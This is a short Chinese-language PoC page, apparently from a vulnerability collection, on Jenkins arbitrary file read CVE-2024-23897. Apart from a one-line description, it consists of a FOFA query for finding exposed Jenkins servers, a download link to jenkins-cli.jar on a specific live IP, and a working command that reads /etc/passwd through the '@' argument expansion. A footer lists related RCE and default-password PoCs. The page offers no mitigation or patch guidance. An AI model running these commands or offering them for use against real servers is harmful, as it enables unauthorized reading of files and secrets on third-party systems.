Jenkins任意文件读取漏洞(CVE-2024-23897)

漏洞描述

PoC代码[已公开]

## Jenkins任意文件读取漏洞(CVE-2024-23897)



Jenkins CLI 是 Jenkins 内置的命令行页面。



Jenkins 受影响版本中使用 args4j 库解析CLI命令参数，该库默认将参数中 @ 字符后的文件路径替换为文件内容，攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件)





## fofa

```

app="Jenkins"

```



## 根据社区公布的poc：

```

https://twitter.com/shoucccc/status/1750601321831633026

```



此漏洞需要使用到jenkins-cli.jar。读者可以从任意Jenkins网页地址下载： http://129.146.32.86:8080/jnlpJars/jenkins-cli.jar



```

java -jar jenkins-cli.jar -s http://:8080/ connect-node "@/etc/passwd"

```

![image](https://github.com/wy876/POC/assets/139549762/bba2e17e-472a-4694-b877-c54c3be42a55)

相关漏洞推荐

• CVE-2018-1000861: Jenkins 2.138 Remote Command Execution POC

  2025-09-01 | Jenkins
  A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier...

• jenkins-default-pwd: Jenkins Default Password POC

  2025-09-01 | Jenkins
  app="Jenkins"

• jenkins-api-panel: Jenkins API Instance Detection Template POC

  2025-09-01 | jenkins-api-panel
  Try to detect the presence of a Jenkins API instance via the API default XML endpoint

• Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

  2025-09-19 | Journyx
  Journyx是一个项目和工资单的员工时间跟踪软件，可以轻松且高效地收集员工时间表和费用数据。 Journyx 的soap_cgi.pyc API 处理程序允许 SOAP 请求的 X...

• Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

  2025-09-19 | Whoogle search
  Whoogle search是一个自托管、无广告、尊重隐私的元搜索引擎。Whoogle search v0.9.0 的/models/config.py 中存在一个问题，允许攻击者通过提供精心设计的搜...